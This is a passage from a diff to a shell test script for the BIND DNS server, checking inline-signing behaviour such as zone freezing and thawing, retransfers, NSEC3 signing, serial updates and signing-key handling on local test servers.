"status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + test $ret = 0 && break + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# allow 1 second so that file time stamps change +sleep 1 + +n=$((n + 1)) +echo_i "checking rndc freeze/thaw of server ($n)" +ret=0 +$RNDCCMD 10.53.0.3 freeze > freeze.test$n 2>&1 || ret=1 +sleep 1 +awk '$2 == ";" && $3 ~ /serial/ { printf("%d %s %s\n", $1 + 1, $2, $3); next; } + { print; } + END { print "freeze2.dynamic. 
0 TXT freeze2"; } ' ns3/dynamic.db > ns3/dynamic.db.new
+mv ns3/dynamic.db.new ns3/dynamic.db
+$RNDCCMD 10.53.0.3 thaw > thaw.test$n 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check added record freeze2.dynamic ($n)"
+for i in 1 2 3 4 5 6 7 8 9
+do
+ ret=0
+ $DIG $DIGOPTS @10.53.0.3 freeze2.dynamic TXT > dig.out.ns3.test$n
+ grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+ grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1
+ test $ret = 0 && break
+ sleep 1
+done
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check rndc reload allows reuse of inline-signing zones ($n)"
+ret=0
+{ $RNDCCMD 10.53.0.3 reload 2>&1 || ret=1 ; } | sed 's/^/ns3 /' | cat_i
+grep "not reusable" ns3/named.run > /dev/null 2>&1 && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check rndc sync removes both signed and unsigned journals ($n)"
+ret=0
+[ -f ns3/dynamic.db.jnl ] || ret=1
+[ -f ns3/dynamic.db.signed.jnl ] || ret=1
+$RNDCCMD 10.53.0.3 sync -clean dynamic 2>&1 || ret=1
+[ -f ns3/dynamic.db.jnl ] && ret=1
+[ -f ns3/dynamic.db.signed.jnl ] && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+$NSUPDATE << EOF
+zone retransfer
+server 10.53.0.2 ${PORT}
+update add added.retransfer 0 A 1.2.3.4
+send
+
+EOF
+
+n=$((n + 1))
+echo_i "checking that the retransfer record is added on the hidden primary ($n)"
+ret=0
+$DIG $DIGOPTS @10.53.0.2 added.retransfer A > dig.out.ns2.test$n
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "checking that the change has not been transferred due to notify ($n)"
+ret=0
+for i in 0 1 2 3 4 5 6 7 8 9
+do
+ ans=0
+ $DIG $DIGOPTS @10.53.0.3 added.retransfer A > dig.out.ns3.test$n
+ grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ans=1
+ [ $ans = 0 ] && break
+ sleep 1
+done
+if [ $ans != 1 ]; then echo_i "failed"; ret=1; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check rndc retransfer of a inline secondary zone works ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 retransfer retransfer 2>&1 || ret=1
+for i in 0 1 2 3 4 5 6 7 8 9
+do
+ ans=0
+ $DIG $DIGOPTS @10.53.0.3 added.retransfer A > dig.out.ns3.test$n
+ grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ans=1
+ grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ans=1
+ [ $ans = 0 ] && break
+ sleep 1
+done
+[ $ans = 1 ] && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check 'rndc signing -nsec3param' requests are queued for zones which are not loaded ($n)"
+ret=0
+# The "retransfer3" zone is configured with "allow-transfer { none; };" on ns2,
+# which means it should not yet be available on ns3.
+$DIG $DIGOPTS @10.53.0.3 retransfer3 SOA > dig.out.ns3.pre.test$n
+grep "status: SERVFAIL" dig.out.ns3.pre.test$n > /dev/null || ret=1
+# Switch the zone to NSEC3. An "NSEC3 -> NSEC -> NSEC3" sequence is used purely
+# to test that multiple queued "rndc signing -nsec3param" requests are handled
+# properly.
+$RNDCCMD 10.53.0.3 signing -nsec3param 1 0 0 - retransfer3 > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.3 signing -nsec3param none retransfer3 > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.3 signing -nsec3param 1 0 0 - retransfer3 > /dev/null 2>&1 || ret=1
+# Reconfigure ns2 to allow outgoing transfers for the "retransfer3" zone.
+sed "s|\(allow-transfer { none; };.*\)|// \1|;" ns2/named.conf > ns2/named.conf.new
+mv ns2/named.conf.new ns2/named.conf
+$RNDCCMD 10.53.0.2 reconfig || ret=1
+# Request ns3 to retransfer the "retransfer3" zone.
+$RNDCCMD 10.53.0.3 retransfer retransfer3 || ret=1
+# Check whether "retransfer3" uses NSEC3 as requested.
+for i in 0 1 2 3 4 5 6 7 8 9
+do
+ ret=0
+ $DIG $DIGOPTS @10.53.0.3 nonexist.retransfer3 A > dig.out.ns3.post.test$n.$i
+ grep "status: NXDOMAIN" dig.out.ns3.post.test$n.$i > /dev/null || ret=1
+ grep "NSEC3" dig.out.ns3.post.test$n.$i > /dev/null || ret=1
+ test $ret -eq 0 && break
+ sleep 1
+done
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check rndc retransfer of a inline nsec3 secondary retains nsec3 ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 signing -nsec3param 1 0 0 - retransfer3 > /dev/null 2>&1 || ret=1
+for i in 0 1 2 3 4 5 6 7 8 9
+do
+ ans=0
+ $DIG $DIGOPTS @10.53.0.3 nonexist.retransfer3 A > dig.out.ns3.pre.test$n
+ grep "status: NXDOMAIN" dig.out.ns3.pre.test$n > /dev/null || ans=1
+ grep "NSEC3" dig.out.ns3.pre.test$n > /dev/null || ans=1
+ [ $ans = 0 ] && break
+ sleep 1
+done
+$RNDCCMD 10.53.0.3 retransfer retransfer3 2>&1 || ret=1
+for i in 0 1 2 3 4 5 6 7 8 9
+do
+ ans=0
+ $DIG $DIGOPTS @10.53.0.3 nonexist.retransfer3 A > dig.out.ns3.post.test$n
+ grep "status: NXDOMAIN" dig.out.ns3.post.test$n > /dev/null || ans=1
+ grep "NSEC3" dig.out.ns3.post.test$n > /dev/null || ans=1
+ [ $ans = 0 ] && break
+ sleep 1
+done
+[ $ans = 1 ] && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+# NOTE: The test below should be considered fragile. More details can be found
+# in the comment inside ns7/named.conf.
+n=$((n + 1))
+echo_i "check rndc retransfer of a inline nsec3 secondary does not trigger an infinite loop ($n)"
+ret=0
+zone=nsec3-loop
+# Add secondary zone using rndc
+$RNDCCMD 10.53.0.7 addzone $zone \
+ '{ type secondary; primaries { 10.53.0.2; }; file "'$zone'.db"; inline-signing yes; auto-dnssec maintain; };'
+# Wait until secondary zone is fully signed using NSEC
+for i in 1 2 3 4 5 6 7 8 9 0
+do
+ ret=1
+ $RNDCCMD 10.53.0.7 signing -list $zone > signing.out.test$n 2>&1
+ keys=$(grep '^Done signing' signing.out.test$n | wc -l)
+ [ $keys -eq 3 ] && ret=0 && break
+ sleep 1
+done
+# Switch secondary zone to NSEC3
+$RNDCCMD 10.53.0.7 signing -nsec3param 1 0 2 12345678 $zone > /dev/null 2>&1
+# Wait until secondary zone is fully signed using NSEC3
+for i in 1 2 3 4 5 6 7 8 9 0
+do
+ ret=1
+ nsec3param=$($DIG $DIGOPTS +nodnssec +short @10.53.0.7 nsec3param $zone)
+ test "$nsec3param" = "1 0 2 12345678" && ret=0 && break
+ sleep 1
+done
+# Attempt to retransfer the secondary zone from primary
+$RNDCCMD 10.53.0.7 retransfer $zone
+# Check whether the signer managed to fully sign the retransferred zone by
+# waiting for a specific SOA serial number to appear in the logs; if this
+# specific SOA serial number does not appear in the logs, it means the signer
+# has either ran into an infinite loop or crashed; note that we check the logs
+# instead of sending SOA queries to the signer as these may influence its
+# behavior in a way which may prevent the desired scenario from being
+# reproduced (see comment in ns7/named.conf)
+for i in 1 2 3 4 5 6 7 8 9 0
+do
+ ret=1
+ grep "ns2.$zone. . 10 20 20 1814400 3600" ns7/named.run > /dev/null 2>&1
+ [ $? -eq 0 ] && ret=0 && break
+ sleep 1
+done
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "stop bump in the wire signer server ($n)"
+ret=0
+stop_server ns3 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "update SOA record while stopped"
+cp ns3/master4.db.in ns3/master.db
+rm ns3/master.db.jnl
+
+n=$((n + 1))
+echo_i "restart bump in the wire signer server ($n)"
+ret=0
+start_server --noclean --restart --port ${PORT} ns3 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "updates to SOA parameters other than serial while stopped are reflected in signed zone ($n)"
+ret=0
+for i in 1 2 3 4 5 6 7 8 9
+do
+ ans=0
+ $DIG $DIGOPTS @10.53.0.3 master SOA > dig.out.ns3.test$n
+ grep "hostmaster" dig.out.ns3.test$n > /dev/null || ans=1
+ grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ans=1
+ [ $ans = 1 ] || break
+ sleep 1
+done
+[ $ans = 0 ] || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check that reloading all zones does not cause zone maintenance to cease for inline-signed zones ($n)"
+ret=1
+# Ensure "rndc reload" attempts to load ns3/master.db by waiting 1 second so
+# that the file modification time has no possibility of being equal to
+# the one stored during server startup.
+sleep 1
+nextpart ns3/named.run > /dev/null
+cp ns3/master5.db.in ns3/master.db
+rndc_reload ns3 10.53.0.3
+for i in 1 2 3 4 5 6 7 8 9 10
+do
+ if nextpart ns3/named.run | grep "zone master.*sending notifies" > /dev/null; then
+ ret=0
+ break
+ fi
+ sleep 1
+done
+# Sanity check: file updates should be reflected in the signed zone,
+# i.e. SOA RNAME should no longer be set to "hostmaster".
+$DIG $DIGOPTS @10.53.0.3 master SOA > dig.out.ns3.test$n || ret=1
+grep "hostmaster" dig.out.ns3.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check that reloading errors prevent synchronization ($n)"
+ret=1
+$DIG $DIGOPTS +short @10.53.0.3 master SOA > dig.out.ns3.test$n.1 || ret=1
+sleep 1
+nextpart ns3/named.run > /dev/null
+cp ns3/master6.db.in ns3/master.db
+rndc_reload ns3 10.53.0.3
+for i in 1 2 3 4 5 6 7 8 9 10
+do
+ if nextpart ns3/named.run | grep "not loaded due to errors" > /dev/null
+ then
+ ret=0
+ break
+ fi
+ sleep 1
+done
+# Sanity check: the SOA record should be unchanged
+$DIG $DIGOPTS +short @10.53.0.3 master SOA > dig.out.ns3.test$n.2 || ret=1
+$DIFF dig.out.ns3.test$n.1 dig.out.ns3.test$n.2 > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check inline-signing with an include file ($n)"
+ret=0
+$DIG $DIGOPTS +short @10.53.0.3 master SOA > dig.out.ns3.test$n.1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+sleep 1
+nextpart ns3/named.run > /dev/null
+cp ns3/master7.db.in ns3/master.db
+rndc_reload ns3 10.53.0.3
+_includefile_loaded() {
+ $DIG $DIGOPTS @10.53.0.3 f.master A > dig.out.ns3.test$n
+ grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || return 1
+ grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || return 1
+ grep "10\.0\.0\.7" dig.out.ns3.test$n > /dev/null || return 1
+ return 0
+}
+retry_quiet 10 _includefile_loaded
+# Sanity check: the SOA record should be changed
+$DIG $DIGOPTS +short @10.53.0.3 master SOA > dig.out.ns3.test$n.2 || ret=1
+$DIFF dig.out.ns3.test$n.1 dig.out.ns3.test$n.2 > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "test add/del zone combinations ($n)"
+ret=0
+for zone in a b c d e f g h i j k l m n o p q r s t u v w x y z
+do
+$RNDCCMD 10.53.0.2 addzone test-$zone \
+ '{ type primary; file "bits.db.in"; allow-transfer { any; }; };'
+$DIG $DIGOPTS @10.53.0.2 test-$zone SOA > dig.out.ns2.$zone.test$n
+grep "status: NOERROR," dig.out.ns2.$zone.test$n > /dev/null || { ret=1; cat dig.out.ns2.$zone.test$n; }
+$RNDCCMD 10.53.0.3 addzone test-$zone \
+ '{ type secondary; primaries { 10.53.0.2; }; file "'test-$zone.bk'"; inline-signing yes; auto-dnssec maintain; allow-transfer { any; }; };'
+$RNDCCMD 10.53.0.3 delzone test-$zone > /dev/null 2>&1
+done
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "testing adding external keys to a inline zone ($n)"
+ret=0
+$DIG $DIGOPTS @10.53.0.3 dnskey externalkey > dig.out.ns3.test$n
+for alg in ${DEFAULT_ALGORITHM_NUMBER} ${ALTERNATIVE_ALGORITHM_NUMBER}
+do
+ [ $alg = 13 -a ! -f checkecdsa ] && continue;
+
+ case $alg in
+ 7) echo_i "checking NSEC3RSASHA1";;
+ 8) echo_i "checking RSASHA256";;
+ 13) echo_i "checking ECDSAP256SHA256";;
+ *) echo_i "checking $alg";;
+ esac
+
+ dnskeys=$(grep "IN.DNSKEY.25[67] [0-9]* $alg " dig.out.ns3.test$n | wc -l)
+ rrsigs=$(grep "RRSIG.DNSKEY $alg " dig.out.ns3.test$n | wc -l)
+ test ${dnskeys:-0} -eq 3 || { echo_i "failed $alg (dnskeys ${dnskeys:-0})"; ret=1; }
+ test ${rrsigs:-0} -eq 2 || { echo_i "failed $alg (rrsigs ${rrsigs:-0})"; ret=1; }
+done
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "testing imported key won't overwrite a private key ($n)"
+ret=0
+key=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} import.example)
+cp ${key}.key import.key
+# import should fail
+$IMPORTKEY -f import.key import.example > /dev/null 2>&1 && ret=1
+rm -f ${key}.private
+# private key removed; import should now succeed
+$IMPORTKEY -f import.key import.example > /dev/null 2>&1 || ret=1
+# now that it's an external key, re-import should succeed
+$IMPORTKEY -f import.key import.example > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "testing updating inline secure serial via 'rndc signing -serial' ($n)"
+ret=0
+$DIG $DIGOPTS nsec3. SOA @10.53.0.3 > dig.out.n3.pre.test$n
+newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] + 10) if ($field[3] eq "SOA"); }' < dig.out.n3.pre.test$n)
+$RNDCCMD 10.53.0.3 signing -serial ${newserial:-0} nsec3 > /dev/null 2>&1
+retry_quiet 5 wait_for_serial 10.53.0.3 nsec3. "${newserial:-0}" dig.out.ns3.post.test$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "testing updating inline secure serial via 'rndc signing -serial' with negative change ($n)"
+ret=0
+$DIG $DIGOPTS nsec3. SOA @10.53.0.3 > dig.out.n3.pre.test$n
+oldserial=$(awk '$4 == "SOA" { print $7 }' dig.out.n3.pre.test$n)
+newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] - 10) if ($field[3] eq "SOA"); }' < dig.out.n3.pre.test$n)
+$RNDCCMD 10.53.0.3 signing -serial ${newserial:-0} nsec3 > /dev/null 2>&1
+sleep 1
+$DIG $DIGOPTS nsec3. SOA @10.53.0.3 > dig.out.ns3.post.test$n
+serial=$(awk '$4 == "SOA" { print $7 }' dig.out.ns3.post.test$n)
+[ ${oldserial:-0} -eq ${serial:-1} ] || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+#
+# Freezing only operates on the raw zone.
+#
+n=$((n + 1))
+echo_i "testing updating inline secure serial via 'rndc signing -serial' when frozen ($n)"
+ret=0
+$DIG $DIGOPTS nsec3. SOA @10.53.0.3 > dig.out.n3.pre.test$n
+oldserial=$(awk '$4 == "SOA" { print $7 }' dig.out.n3.pre.test$n)
+newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] + 10) if ($field[3] eq "SOA"); }' < dig.out.n3.pre.test$n)
+$RNDCCMD 10.53.0.3 freeze nsec3 > /dev/null 2>&1
+$RNDCCMD 10.53.0.3 signing -serial ${newserial:-0} nsec3 > /dev/null 2>&1
+$RNDCCMD 10.53.0.3 thaw nsec3 > /dev/null 2>&1
+retry_quiet 5 wait_for_serial 10.53.0.3 nsec3. "${newserial:-0}" dig.out.ns3.post1.test$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "testing updating dynamic serial via 'rndc signing -serial' ($n)"
+ret=0
+$DIG $DIGOPTS bits. SOA @10.53.0.2 > dig.out.ns2.pre.test$n
+newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] + 10) if ($field[3] eq "SOA"); }' < dig.out.ns2.pre.test$n)
+$RNDCCMD 10.53.0.2 signing -serial ${newserial:-0} bits > /dev/null 2>&1
+retry_quiet 5 wait_for_serial 10.53.0.2 bits. "${newserial:-0}" dig.out.ns2.post.test$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "testing updating dynamic serial via 'rndc signing -serial' with negative change ($n)"
+ret=0
+$DIG $DIGOPTS bits. SOA @10.53.0.2 > dig.out.ns2.pre.test$n
+oldserial=$(awk '$4 == "SOA" { print $7 }' dig.out.ns2.pre.test$n)
+newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] - 10) if ($field[3] eq "SOA"); }' < dig.out.ns2.pre.test$n)
+$RNDCCMD 10.53.0.2 signing -serial ${newserial:-0} bits > /dev/null 2>&1
+retry_quiet 5 wait_for_serial 10.53.0.2 bits. "${newserial:-1}" dig.out.ns2.post1.test$n && ret=1
+retry_quiet 5 wait_for_serial 10.53.0.2 bits. "${oldserial:-1}" dig.out.ns2.post2.test$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "testing updating dynamic serial via 'rndc signing -serial' when frozen ($n)"
+ret=0
+$DIG $DIGOPTS bits. SOA @10.53.0.2 > dig.out.ns2.pre.test$n
+oldserial=$(awk '$4 == "SOA" { print $7 }' dig.out.ns2.pre.test$n)
+newserial=$($PERL -e 'while (<>) { chomp; my @field = split /\s+/; printf("%u\n", $field[6] + 10) if ($field[3] eq "SOA"); }' < dig.out.ns2.pre.test$n)
+$RNDCCMD 10.53.0.2 freeze bits > /dev/null 2>&1
+$RNDCCMD 10.53.0.2 signing -serial ${newserial:-0} bits > /dev/null 2>&1
+$RNDCCMD 10.53.0.2 thaw bits > /dev/null 2>&1
+retry_quiet 5 wait_for_serial 10.53.0.2 bits. "${newserial:-1}" dig.out.ns2.post1.test$n && ret=1
+retry_quiet 5 wait_for_serial 10.53.0.2 bits. "${oldserial:-1}" dig.out.ns2.post2.test$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "testing that inline signing works with inactive ZSK and active KSK ($n)"
+ret=0
+
+$DIG $DIGOPTS @10.53.0.3 soa inactivezsk > dig.out.ns3.pre.test$n || ret=1
+soa1=$(awk '$4 == "SOA" { print $7 }' dig.out.ns3.pre.test$n)
+
+$NSUPDATE << EOF
+server 10.53.0.2 ${PORT}
+update add added.inactivezsk 0 IN TXT added record
+send
+EOF
+
+for i in 1 2 3 4 5 6 7 8 9 10
+do
+ $DIG $DIGOPTS @10.53.0.3 soa inactivezsk > dig.out.ns3.post.test$n || ret=1
+ soa2=$(awk '$4 == "SOA" { print $7 }' dig.out.ns3.post.test$n)
+ test ${soa1:-0} -ne ${soa2:-0} && break
+ sleep 1
+done
+test ${soa1:-0} -ne ${soa2:-0} || ret=1
+
+$DIG $DIGOPTS @10.53.0.3 txt added.inactivezsk > dig.out.ns3.test$n || ret=1
+grep "ANSWER: 3," dig.out.ns3.test$n > /dev/null || ret=1
+grep "RRSIG" dig.out.ns3.test$n > /dev/null || ret=1
+grep "TXT ${DEFAULT_ALGORITHM_NUMBER} 2" dig.out.ns3.test$n > /dev/null || ret=1
+grep "TXT ${ALTERNATIVE_ALGORITHM_NUMBER} 2" dig.out.ns3.test$n > /dev/null || ret=1
+
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "testing that inline signing works with inactive KSK and active ZSK ($n)"
+ret=0
+
+$DIG $DIGOPTS @10.53.0.3 axfr inactiveksk > dig.out.ns3.test$n
+
+#
+# check that DNSKEY is signed with ZSK for default algorithm
+#
+awk='$4 == "DNSKEY" && $5 == 256 && $7 == alg { print }'
+zskid=$(awk -v alg=${DEFAULT_ALGORITHM_NUMBER} "${awk}" dig.out.ns3.test$n |
+ $DSFROMKEY -A -2 -f - inactiveksk | awk '{ print $4}' )
+grep "DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 1 [0-9]* [0-9]* [0-9]* ${zskid} " dig.out.ns3.test$n > /dev/null || ret=1
+awk='$4 == "DNSKEY" && $5 == 257 && $7 == alg { print }'
+kskid=$(awk -v alg=${DEFAULT_ALGORITHM_NUMBER} "${awk}" dig.out.ns3.test$n |
+ $DSFROMKEY -2 -f - inactiveksk | awk '{ print $4}' )
+grep "DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 1 [0-9]* [0-9]* [0-9]* ${kskid} " dig.out.ns3.test$n > /dev/null && ret=1
+
+#
+# check that DNSKEY is signed with KSK for alternative algorithm
+#
+awk='$4 == "DNSKEY" && $5 == 256 && $7 == alg { print }'
+zskid=$(awk -v alg=${ALTERNATIVE_ALGORITHM_NUMBER} "${awk}" dig.out.ns3.test$n |
+ $DSFROMKEY -A -2 -f - inactiveksk | awk '{ print $4}' )
+grep "DNSKEY ${ALTERNATIVE_ALGORITHM_NUMBER} 1 [0-9]* [0-9]* [0-9]* ${zskid} " dig.out.ns3.test$n > /dev/null && ret=1
+awk='$4 == "DNSKEY" && $5 == 257 && $7 == alg { print }'
+kskid=$(awk -v alg=${ALTERNATIVE_ALGORITHM_NUMBER} "${awk}" dig.out.ns3.test$n |
+ $DSFROMKEY -2 -f - inactiveksk | awk '{ print $4}' )
+grep "DNSKEY ${ALTERNATIVE_ALGORITHM_NUMBER} 1 [0-9]* [0-9]* [0-9]* ${kskid} " dig.out.ns3.test$n > /dev/null || ret=1
+
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+# Wait until an update to the raw part of a given inline signed zone is fully
+# processed. As waiting for a fixed amount of time is suboptimal and there is
+# no single message that would signify both a successful modification and an
+# error in a race-free manner, instead wait until either notifies are sent
+# (which means the secure zone was modified) or a receive_secure_serial() error
+# is logged (which means the zone was not modified and will not be modified any
+# further in response to the relevant raw zone update).
+wait_until_raw_zone_update_is_processed() {
+ zone="$1"
+ for i in 1 2 3 4 5 6 7 8 9 10
+ do
+ if nextpart ns3/named.run | grep -E "zone ${zone}.*(sending notifies|receive_secure_serial)" > /dev/null; then
+ return
+ fi
+ sleep 1
+ done
+}
+
+n=$((n + 1))
+echo_i "checking that changes to raw zone are applied to a previously unsigned secure zone ($n)"
+ret=0
+# Query for bar.nokeys/A and ensure the response is negative. As this zone
+# does not have any signing keys set up, the response must be unsigned.
+$DIG $DIGOPTS @10.53.0.3 bar.nokeys. A > dig.out.ns3.pre.test$n 2>&1 || ret=1
+grep "status: NOERROR" dig.out.ns3.pre.test$n > /dev/null && ret=1
+grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null && ret=1
+# Ensure the wait_until_raw_zone_update_is_processed() call below will ignore
+# log messages generated before the raw zone is updated.
+nextpart ns3/named.run > /dev/null
+# Add a record to the raw zone on the primary.
+$NSUPDATE << EOF || ret=1
+zone nokeys.
+server 10.53.0.2 ${PORT}
+update add bar.nokeys. 0 A 127.0.0.1
+send
+EOF
+wait_until_raw_zone_update_is_processed "nokeys"
+# Query for bar.nokeys/A again and ensure the signer now returns a positive,
+# yet still unsigned response.
+$DIG $DIGOPTS @10.53.0.3 bar.nokeys. A > dig.out.ns3.post.test$n 2>&1
+grep "status: NOERROR" dig.out.ns3.post.test$n > /dev/null || ret=1
+grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "checking that changes to raw zone are not applied to a previously signed secure zone with no keys available (primary) ($n)"
+ret=0
+# Query for bar.removedkeys-primary/A and ensure the response is negative. As
+# this zone has signing keys set up, the response must be signed.
+$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-primary. A > dig.out.ns3.pre.test$n 2>&1 || ret=1
+grep "status: NOERROR" dig.out.ns3.pre.test$n > /dev/null && ret=1
+grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null || ret=1
+# Remove the signing keys for this zone.
+mv -f ns3/Kremovedkeys-primary* ns3/removedkeys
+# Ensure the wait_until_raw_zone_update_is_processed() call below will ignore
+# log messages generated before the raw zone is updated.
+nextpart ns3/named.run > /dev/null
+# Add a record to the raw zone on the primary.
+$NSUPDATE << EOF || ret=1
+zone removedkeys-primary.
+server 10.53.0.3 ${PORT}
+update add bar.removedkeys-primary. 0 A 127.0.0.1
+send
+EOF
+wait_until_raw_zone_update_is_processed "removedkeys-primary"
+# Query for bar.removedkeys-primary/A again and ensure the signer still returns
+# a negative, signed response.
+$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-primary. A > dig.out.ns3.post.test$n 2>&1
+grep "status: NOERROR" dig.out.ns3.post.test$n > /dev/null && ret=1
+grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "checking that backlogged changes to raw zone are applied after keys become available (primary) ($n)"
+ret=0
+# Restore the signing keys for this zone.
+mv ns3/removedkeys/Kremovedkeys-primary* ns3
+$RNDCCMD 10.53.0.3 loadkeys removedkeys-primary > /dev/null 2>&1
+# Determine what a SOA record with a bumped serial number should look like.
+BUMPED_SOA=$(sed -n 's/.*\(add removedkeys-primary.*IN.*SOA\)/\1/p;' ns3/named.run | tail -1 | awk '{$8 += 1; print $0}')
+# Ensure the wait_until_raw_zone_update_is_processed() call below will ignore
+# log messages generated before the raw zone is updated.
+nextpart ns3/named.run > /dev/null
+# Bump the SOA serial number of the raw zone.
+$NSUPDATE << EOF || ret=1
+zone removedkeys-primary.
+server 10.53.0.3 ${PORT}
+update del removedkeys-primary. SOA
+update ${BUMPED_SOA}
+send
+EOF
+wait_until_raw_zone_update_is_processed "removedkeys-primary"
+# Query for bar.removedkeys-primary/A again and ensure the signer now returns a
+# positive, signed response.
+$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-primary. A > dig.out.ns3.test$n 2>&1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+grep "RRSIG" dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "checking that changes to raw zone are not applied to a previously signed secure zone with no keys available (secondary) ($n)"
+ret=0
+# Query for bar.removedkeys-secondary/A and ensure the response is negative. As this
+# zone does have signing keys set up, the response must be signed.
+$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-secondary. A > dig.out.ns3.pre.test$n 2>&1 || ret=1
+grep "status: NOERROR" dig.out.ns3.pre.test$n > /dev/null && ret=1
+grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null || ret=1
+# Remove the signing keys for this zone.
+mv -f ns3/Kremovedkeys-secondary* ns3/removedkeys
+# Ensure the wait_until_raw_zone_update_is_processed() call below will ignore
+# log messages generated before the raw zone is updated.
+nextpart ns3/named.run > /dev/null
+# Add a record to the raw zone on the primary.
+$NSUPDATE << EOF || ret=1
+zone removedkeys-secondary.
+server 10.53.0.2 ${PORT}
+update add bar.removedkeys-secondary. 0 A 127.0.0.1
+send
+EOF
+wait_until_raw_zone_update_is_processed "removedkeys-secondary"
+# Query for bar.removedkeys-secondary/A again and ensure the signer still returns a
+# negative, signed response.
+$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-secondary. A > dig.out.ns3.post.test$n 2>&1
+grep "status: NOERROR" dig.out.ns3.post.test$n > /dev/null && ret=1
+grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
